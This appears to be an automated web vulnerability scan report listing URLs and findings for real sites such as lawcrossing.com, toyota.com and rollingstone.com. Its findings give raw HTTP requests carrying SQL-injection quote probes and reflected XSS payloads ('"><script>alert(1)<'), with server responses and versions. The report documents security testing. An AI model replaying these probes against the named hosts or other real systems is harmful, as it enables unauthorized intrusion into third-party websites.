19.56. http://www.journalismcrossing.com/
19.57. http://www.logisticscrossing.com/
19.58. http://www.managercrossing.com/
19.59. http://www.manufacturingcrossing.com/
19.60. http://www.marketingcrossing.com/
19.61. http://www.mediajobcrossing.com/
19.62. http://www.medicalschoolloans.com/
19.63. http://www.militarycrossing.com/
19.64. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
19.65. http://www.nursingcrossing.com/
19.66. http://www.nytimes.com/2011/01/18/books/18book.html
19.67. http://www.occupationaltherapycrossing.com/
19.68. http://www.operationscrossing.com/
19.69. http://www.parttimecrossing.com/
19.70. http://www.pharmaceuticalcrossing.com/
19.71. http://www.physicalsecuritycrossing.com/
19.72. http://www.physicaltherapycrossing.com/
19.73. http://www.planningcrossing.com/
19.74. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
19.75. http://www.postdoctoralfellowcrossing.com/
19.76. http://www.prcrossing.com/
19.77. http://www.procurementcrossing.com/
19.78. http://www.productmanagercrossing.com/
19.79. http://www.projectmanagementcrossing.com/
19.80. http://www.publicinterestcrossing.com/
19.81. http://www.publishingcrossing.com/
19.82. http://www.purchasingcrossing.com/
19.83. http://www.qaqccrossing.com/
19.84. http://www.radiocrossing.com/
19.85. http://www.realestateandlandcrossing.com/
19.86. http://www.recruitingcrossing.com/
19.87. http://www.researchingcrossing.com/
19.88. http://www.retailcrossing.com/
19.89. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114
19.90. http://www.sciencescrossing.com/
19.91. http://www.scientistcrossing.com/
19.92. http://www.sellingcrossing.com/
19.93. http://www.sqlcrossing.com/
19.94. http://www.teenagercrossing.com/
19.95. http://www.telecomcrossing.com/
19.96. http://www.tradingcrossing.com/
19.97. http://www.trainingcrossing.com/
19.98. http://www.transportationcrossing.com/
19.99. http://www.travelingcrossing.com/
19.100. http://www.truckingcrossing.com/
19.101. http://www.tvcrossing.com/
19.102. http://www.underwritingcrossing.com/
19.103. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
19.104. http://www.veterinarycrossing.com/
19.105. http://www.volunteercrossing.com/
19.106. http://www.workathomecrossing.com/
19.107. http://www.writingcrossing.com/
20.1. https://www.bmwusa.com/Secured/FrameCheck.aspx
20.2. https://www.lowermybills.com/lending/home-refinance/
20.3. https://www.toyotafinancial.com/consumer/tfs.portal
21. HTML does not specify charset
21.1. https://www.lowermybills.com/lending/home-refinance/
21.2. http://www.softcomplex.com/products/tigra_calendar_pro/
21.3. http://www.toyota.co.jp/en/index.html
21.4. http://www.toyota.com/download-brochure.html
21.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354
22. Content type incorrectly stated
22.1. http://www.100kcrossing.com/favicon.ico
22.2. http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php
22.4. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png
22.5. http://www.bcgsearch.com/favicon.ico
22.6. http://www.legalauthority.com/tmviewbanner.php
22.7. http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif
22.8. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.edfed.com |
| Path: | / |
| GET /?1%00'=1 HTTP/1.1 Host: www.edfed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:58 GMT Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=j2smse82uc Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 154420 <script type="text/javascript" src="http://www.edfed.com <script type="text/javascript" src="http://www.edfed.com <script type="t ...[SNIP]... told me it would be! The monthly payment that they expected me to make was ridiculous! How could I, a recent grad, afford to make payments like that every month? I called to complain to them about the error on my account. They told me that the person th...<br> ...[SNIP]... |
| GET /?1%00''=1 HTTP/1.1 Host: www.edfed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:59 GMT Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=l24gtaf6dh Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 154341 <script type="text/javascript" src="http://www.edfed.com <script type="text/javascript" src="http://www.edfed.com <script type="t ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.lawcrossing |
| Path: | /lcjssearchresults.php |
| GET /lcjssearchresults.php' HTTP/1.1 Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=768gpl04fu Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:51 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 211210 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La ...[SNIP]... <td colspan="2" height="25" class="error" style="font-size:12px;"> ...[SNIP]... report, Hate Crime Statistics, that revealed a 25% increase of hate crimes against Latinos in just three short years. Interestingly (or maybe not), this coincided with the new and growing interest of illegal immigration from Mexico in the United States. <br> ...[SNIP]... |
| GET /lcjssearchresults.php'' HTTP/1.1 Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 19:41:52 GMT Server: Apache Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ukbkja300k Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:52 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103002 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.lawcrossing |
| Path: | /salarysurvey/lcsala |
| GET /salarysurvey/lcsala Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 22:31:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=hkesccpn53 Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 102960 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... <td colspan="2" height="25" class="error" style="font-size:12px;"> ...[SNIP]... |
| GET /salarysurvey/lcsala Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 22:31:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=pl71ivi9ie Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103039 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.lawcrossing |
| Path: | /salarysurvey/lcsala |
| GET /salarysurvey/lcsala Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 22:30:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=3019nb68al Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:17 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103077 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... <td colspan="2" height="25" class="error" style="font-size:12px;"> ...[SNIP]... |
| GET /salarysurvey/lcsala Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 22:30:18 GMT Server: Apache Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=jieha937m8 Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:18 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103078 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_path = ''; HTT ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.legalauthority |
| Path: | /signup.php |
| GET /signup.php?utm_source Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=iv24lnr1hg Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=iv24lnr1hg Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 56275 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... <br />Who says you can't find a needle in a haystack? With my Legal Authority mailing, I batted a thousand -- got one interview and one offer, and it was in entertainment law, which my Career Services Office said was almost impossible to break into!<br ...[SNIP]... |
| GET /signup.php?utm_source Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=0n342er2lg Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=0n342er2lg Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 57332 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.legalauthority |
| Path: | /signup.php |
| GET /signup.php?utm_source Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=uhv1dg441u Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=uhv1dg441u Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 56502 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... ct, I got an interview at a firm that I had never heard of before but does high-level trademark litigation. I was shocked. How could no one have known about this?!?!?! The salary they offered was also exceptional. I owe my success to you, Legal Authority. Thank you!<br /> ...[SNIP]... |
| GET /signup.php?utm_source Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=3vujbpe2tb Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=3vujbpe2tb Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 56632 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.rollingstone |
| Path: | /music/albumreviews/low |
| GET /music'/albumreviews/low-country Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/5.3.3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Server: Apache (Unix;) Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:18 GMT Connection: close |
| GET /music''/albumreviews/low-country Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found X-Powered-By: PHP/5.3.3 Status: 404 Not Found Content-Type: text/html; charset=utf-8 Server: Apache (Unix;) Content-Length: 18158 Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:19 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.rollingstone |
| Path: | /music/albumreviews/low |
| GET /music/albumreviews'/low-country-blues Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/5.3.3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Server: Apache (Unix;) Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:20 GMT Connection: close |
| GET /music/albumreviews''/low-country-blues Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found X-Powered-By: PHP/5.3.3 Status: 404 Not Found Content-Type: text/html; charset=utf-8 Server: Apache (Unix;) Content-Length: 18158 Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.rollingstone |
| Path: | /music/albumreviews/low |
| GET /music/albumreviews/low Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/5.3.3 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Server: Apache (Unix;) Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:24 GMT Connection: close |
| GET /music/albumreviews/low Host: www.rollingstone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found X-Powered-By: PHP/5.3.3 Status: 404 Not Found Content-Type: text/html; charset=utf-8 Server: Apache (Unix;) Content-Length: 18158 Vary: Accept-Encoding Date: Sat, 22 Jan 2011 01:26:25 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.toyota.com |
| Path: | /js/global/global.js |
| GET /js'/global/global.js HTTP/1.1 Host: www.toyota.com Proxy-Connection: keep-alive Referer: http://www.toyota.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: Apache Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT ETag: "3cb0a-2eb01-d40bf780" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 21 Jan 2011 19:27:45 GMT Connection: close Content-Length: 191233 /** * Toyota.com global library include file. This file includes compressed versions of the following standard libraries: * * Prototype 1.6.1 * Script.aculo.us 1.8.3 * SWFObject 1.5 * SWFAddres ...[SNIP]... ";return{IE:!!window ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.toyota.com |
| Path: | /js/global/global.js |
| GET /js/global'/global.js HTTP/1.1 Host: www.toyota.com Proxy-Connection: keep-alive Referer: http://www.toyota.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: Apache Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT ETag: "3cb0a-2eb01-d40bf780" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 21 Jan 2011 19:27:45 GMT Connection: close Content-Length: 191233 /** * Toyota.com global library include file. This file includes compressed versions of the following standard libraries: * * Prototype 1.6.1 * Script.aculo.us 1.8.3 * SWFObject 1.5 * SWFAddres ...[SNIP]... ";return{IE:!!window ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.toyota.com |
| Path: | /js/global/global.js |
| GET /js/global/global.js' HTTP/1.1 Host: www.toyota.com Proxy-Connection: keep-alive Referer: http://www.toyota.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: Apache Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT ETag: "3cb0a-2eb01-d40bf780" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 21 Jan 2011 19:27:46 GMT Connection: close Content-Length: 191233 /** * Toyota.com global library include file. This file includes compressed versions of the following standard libraries: * * Prototype 1.6.1 * Script.aculo.us 1.8.3 * SWFObject 1.5 * SWFAddres ...[SNIP]... ";return{IE:!!window ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.100kcrossing |
| Path: | / |
| GET /?f63f4"><script>alert(1)< Host: www.100kcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:20 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gpaaeq68r6 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106183 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.accountin |
| Path: | / |
| GET /?d95ab"><script>alert(1)< Host: www.accountingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:19 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=vii0tqv2bf Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116610 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.accountma |
| Path: | / |
| GET /?d1a9f"><script>alert(1)< Host: www.accountmanagemen Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:24 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=uue121nt18 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 137374 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.actuarial |
| Path: | / |
| GET /?2fb17"><script>alert(1)< Host: www.actuarialcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:27 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ri9tldvibq Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114344 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.admincrossing |
| Path: | / |
| GET /?3c58e"><script>alert(1)< Host: www.admincrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:37 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=49j0tdumr2 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109769 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.advertisi |
| Path: | / |
| GET /?27cd5"><script>alert(1)< Host: www.advertisingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
